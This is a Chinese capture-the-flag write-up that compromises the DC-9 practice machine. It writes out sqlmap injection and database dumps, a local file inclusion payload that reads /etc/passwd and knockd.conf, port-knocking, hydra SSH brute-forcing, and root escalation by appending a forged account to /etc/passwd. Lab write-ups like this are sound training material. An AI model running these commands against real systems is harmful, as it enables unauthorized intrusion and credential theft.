当前位置:   article > 正文

渗透测试:DC-9靶机

dc-9靶机

一、扫描获取靶机ip

arp-scan -l
  • 1

在这里插入图片描述

192.168.203.148
  • 1

二、获取网站信息

1.nmap

nmap -sV -A 192.168.203.148
  • 1

在这里插入图片描述

开放了22、80端口

2.Wappaloyzer

访问主页
在这里插入图片描述
Web服务器:Apache 2.4.38

3.dirb

dirb http://192.168.203.148
  • 1

在这里插入图片描述

没有什么可以利用的

三、分析网站

Display 这里向我们显示了所有的用户信息

在这里插入图片描述

Search这里可以通过输入姓或名,可以查询相应信息

在这里插入图片描述
在这里插入图片描述

Manage这里登录用户密码,开始怀疑这里sql注入,但是检测没有,最后发现Search存在sql注入

在这里插入图片描述

4.Burp suit

抓取后发现是post传参

在这里插入图片描述

5.Sqlmap

将数据包保存至1.txt中进行爆破

爆库

sqlmap -r /root/1.txt -p search --dbs
  • 1

在这里插入图片描述

爆表

sqlmap -r /root/1.txt -p search -D users --tables
  • 1

在这里插入图片描述

爆列

sqlmap -r /root/1.txt -p search -D users -T UserDetails --columns
  • 1

在这里插入图片描述

爆字段

sqlmap -r /root/1.txt -p search -D users -T UserDetails -C firstname,lastname,username,password --dump
  • 1

在这里插入图片描述

+-----------+------------+-----------+---------------+| firstname | lastname   | username  | password      |+-----------+------------+-----------+---------------+| Mary      | Moe        | marym     | 3kfs86sfd     || Julie     | Dooley     | julied    | 468sfdfsd2    || Fred      | Flintstone | fredf     | 4sfd87sfd1    || Barney    | Rubble     | barneyr   | RocksOff      || Tom       | Cat        | tomc      | TC&TheBoyz    || Jerry     | Mouse      | jerrym    | B8m#48sd      || Wilma     | Flintstone | wilmaf    | Pebbles       || Betty     | Rubble     | bettyr    | BamBam01      || Chandler  | Bing       | chandlerb | UrAG0D!       || Joey      | Tribbiani  | joeyt     | Passw0rd      || Rachel    | Green      | rachelg   | yN72#dsd      || Ross      | Geller     | rossg     | ILoveRachel   || Monica    | Geller     | monicag   | 3248dsds7s    || Phoebe    | Buffay     | phoebeb   | smellycats    || Scooter   | McScoots   | scoots    | YR3BVxxxw87   || Donald    | Trump      | janitor   | Ilovepeepee   || Scott     | Morrison   | janitor2  | Hawaii-Five-0 |+-----------+------------+-----------+---------------+
  • 1

但是这些账号登录不了,又尝试使用ssh,但是ssh也被过滤了,跑另一个数据库(Staff)

sqlmap -r /root/1.txt -p search -D Staff --tablessqlmap -r /root/1.txt -p search -D Staff -T Users --columnssqlmap -r /root/1.txt -p search -D Staff -T Users --dump
  • 1

在这里插入图片描述

+--------+--------------------------------------------------+----------+| UserID | Password                                         | Username |+--------+--------------------------------------------------+----------+| 1      | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin    |+--------+--------------------------------------------------+----------+admin     transorbital1
  • 1

登陆成功

在这里插入图片描述

可以看到页面下面出现File does not exist的提示,感觉很有可能就是LFI(本地文件包含)

wfuzz ‐p 127.0.0.1:8080:HTTP             #‐p:添加代理
  • 1

字典地址:https://github.com/danielmiessler/SecLists

我们使用里面的burp‐parameter‐names.txt字典

使用burp尝试爆破

http://192.168.203.148/manage.php?a=../../../../etc/passwd
  • 1

在这里插入图片描述
在这里插入图片描述

得知变量名为file

通过…/…/…/…/…/…/proc/sched_debug来查看Linux系统中任务的调度情况

http://192.168.203.148/manage.php?file=../../../../../../proc/sched_debug
  • 1

在这里插入图片描述

四、连接

发现系统使用了knockd 服务

读取下knocked的配置文件

http://192.168.203.148/manage.php?file=../../../../../etc/knockd.conf
  • 1

在这里插入图片描述
方法一 使用nc:
我们需要依次敲击7469 8475 9842端口实现敲门操作

nc 192.168.203.148 7469
nc 192.168.203.148 8475
nc 192.168.203.148 9842
  • 1
  • 2
  • 3

在这里插入图片描述
方法二 使用nmap:

nmap -p 7469 192.168.203.148
nmap -p 8475 192.168.203.148
nmap -p 9842 192.168.203.148
  • 1
  • 2
  • 3

在这里插入图片描述

使用hydra看一下哪些用户可以登上ssh,将用户名密码分别保存为user.txt和pass.txt文件中:
PS:字典里不要有空格

在这里插入图片描述

hydra -L user.txt -P pwd.txt 192.168.203.148 ssh
  • 1

在这里插入图片描述

login: chandlerb   password: UrAG0D!   login: joeyt   password:Passw0rdlogin: janitor   password: Ilovepeepee
  • 1

ssh连接

ssh janitor@192.168.203.148
  • 1

在这里插入图片描述

使用爆破出来的用户登录,然后查看文件ls -la(可查看隐藏目录文件),在用户janitor中发现隐藏的secrets-for-putin目录,里面含有密码passwords-found-on-post-it-notes.txt

在这里插入图片描述

BamBam01Passw0rdsmellycatsP0Lic#10-4B4-Tru3-0014uGU5T-NiGHts
  • 1

我们把这些密码加入到password文件中,再用hydra尝试爆破一次

hydra -L user.txt -P pwd.txt 192.168.203.148 ssh
  • 1

在这里插入图片描述

爆破出一个新的用户

login: fredf   password: B4-Tru3-001
  • 1

ssh连接

五、提权

ssh fredf@192.168.203.148sudo -l
  • 1

在这里插入图片描述

发现fredf可以NO Passwd执行root权限的文件

在这里插入图片描述

提示使用 python test.py 加参数运行

进入/opt/devstuff目录下,看到test.py文件

在这里插入图片描述

含义:3个参数,将第二个参数的文件内容增加在第三个参数文件里面,test目录可以root权限执行

思路:构造有root权限的账户放入到/etc/passwd中,利用构造的账户登录,就有了root权限了

使用openssl生成:

openssl passwd -1 -salt js 233333
  • 1

在这里插入图片描述

$1$js$8LV1DbndSIfP29vG.eYaj1
  • 1

写入到tmp目录下的ciyaso中

echo 'js:$1$js$8LV1DbndSIfP29vG.eYaj1:0:0::/root:/bin/bash' > /tmp/js
  • 1

执行test:

cd /opt/devstuff/dist/testsudo ./test /tmp/js /etc/passwd
  • 1

在这里插入图片描述
登录成功,读取flag

在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小舞很执着/article/detail/987252
推荐阅读
相关标签
  

闽ICP备14008679号